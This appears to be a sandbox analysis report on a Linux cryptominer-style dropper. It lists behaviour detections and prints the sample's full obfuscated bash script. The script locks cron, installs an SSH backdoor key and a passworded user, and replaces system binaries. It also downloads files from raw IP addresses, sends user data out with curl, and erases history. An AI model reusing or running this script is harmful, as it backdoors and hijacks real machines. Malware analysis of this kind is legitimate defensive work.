N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Modifies special file permissions

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/591/maps /usr/sbin/needrestart N/A
File opened for reading /proc/846/maps /usr/sbin/needrestart N/A
File opened for reading /proc/775/maps /usr/sbin/needrestart N/A
File opened for reading /proc/814/maps /usr/sbin/needrestart N/A
File opened for reading /proc/834/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/584/maps /usr/sbin/needrestart N/A
File opened for reading /proc/717/maps /usr/sbin/needrestart N/A
File opened for reading /proc/729/maps /usr/sbin/needrestart N/A
File opened for reading /proc/762/maps /usr/sbin/needrestart N/A
File opened for reading /proc/770/maps /usr/sbin/needrestart N/A
File opened for reading /proc/883/maps /usr/sbin/needrestart N/A
File opened for reading /proc/356/maps /usr/sbin/needrestart N/A
File opened for reading /proc/417/maps /usr/sbin/needrestart N/A
File opened for reading /proc/714/maps /usr/sbin/needrestart N/A
File opened for reading /proc/747/maps /usr/sbin/needrestart N/A
File opened for reading /proc/754/maps /usr/sbin/needrestart N/A
File opened for reading /proc/392/maps /usr/sbin/needrestart N/A
File opened for reading /proc/437/maps /usr/sbin/needrestart N/A
File opened for reading /proc/590/maps /usr/sbin/needrestart N/A
File opened for reading /proc/740/maps /usr/sbin/needrestart N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself pool-spawner /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gmain /usr/bin/gdbus N/A
Changes the process name, possibly in an attempt to hide itself gdbus /usr/bin/gdbus N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pkill N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A
File opened for reading /sys/devices/system/node /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/3550/status /usr/bin/pkill N/A
File opened for reading /proc/4066/stat /usr/bin/pkill N/A
File opened for reading /proc/714/stat /usr/bin/pkill N/A
File opened for reading /proc/1057/status /usr/bin/pkill N/A
File opened for reading /proc/28/environ /usr/sbin/needrestart N/A
File opened for reading /proc/814/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/3737/status /usr/sbin/needrestart N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3474/ctty /usr/bin/pkill N/A
File opened for reading /proc/3569/ctty /usr/bin/pkill N/A
File opened for reading /proc/3671/status /usr/bin/pkill N/A
File opened for reading /proc/3548/stat /usr/sbin/needrestart N/A
File opened for reading /proc/3830/ctty /usr/bin/pkill N/A
File opened for reading /proc/3382/ctty /usr/bin/pkill N/A
File opened for reading /proc/846/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3453/status /usr/bin/pkill N/A
File opened for reading /proc/591/cgroup /usr/bin/pkill N/A
File opened for reading /proc/729/stat /usr/bin/pkill N/A
File opened for reading /proc/3788/stat /usr/bin/pkill N/A
File opened for reading /proc/42/environ /usr/sbin/needrestart N/A
File opened for reading /proc/8/stat /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/44/stat /usr/bin/pkill N/A
File opened for reading /proc/44/ctty /usr/bin/pkill N/A
File opened for reading /proc/3474/cgroup /usr/bin/pkill N/A
File opened for reading /proc/27/stat /usr/bin/pkill N/A
File opened for reading /proc/3860/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3282/environ /usr/sbin/needrestart N/A
File opened for reading /proc/50/status /usr/bin/pkill N/A
File opened for reading /proc/834/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2582/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3737/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3364/status /usr/bin/pkill N/A
File opened for reading /proc/775/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/19/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3883/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1048/root/usr/lib/python3.12/heapq.py /usr/sbin/needrestart N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/192/status /usr/bin/pkill N/A
File opened for reading /proc/34/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3559/cgroup /usr/bin/pkill N/A
File opened for reading /proc/770/status /usr/bin/pkill N/A
File opened for reading /proc/770/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2582/ctty /usr/bin/pkill N/A
File opened for reading /proc/3364/stat /usr/bin/pkill N/A
File opened for reading /proc/3553/stat /usr/bin/pkill N/A
File opened for reading /proc/2582/status /usr/bin/pkill N/A
File opened for reading /proc/4004/ctty /usr/bin/pkill N/A
File opened for reading /proc/27/stat /usr/bin/pkill N/A
File opened for reading /proc/23/stat /usr/sbin/needrestart N/A
File opened for reading /proc/3732/maps /usr/sbin/needrestart N/A
File opened for reading /proc/15/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3821/status /usr/bin/pkill N/A
File opened for reading /proc/3554/cgroup /usr/bin/pkill N/A
File opened for reading /proc/3821/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3549/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/cmdline /usr/bin/pkill N/A
File opened for reading /proc/56/status /usr/sbin/needrestart N/A
File opened for reading /proc/1405/environ /usr/sbin/needrestart N/A
File opened for reading /proc/2582/status /usr/bin/pkill N/A
File opened for reading /proc/1061/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3569/stat /usr/sbin/needrestart N/A
File opened for reading /proc/6/cgroup /usr/bin/pkill N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/apt-get N/A
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A

Processes

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c exec '/tmp/xrx/init0' "$@" /tmp/xrx/init0]

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' "i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! -';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval "$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$uHz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/xrx/init0]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

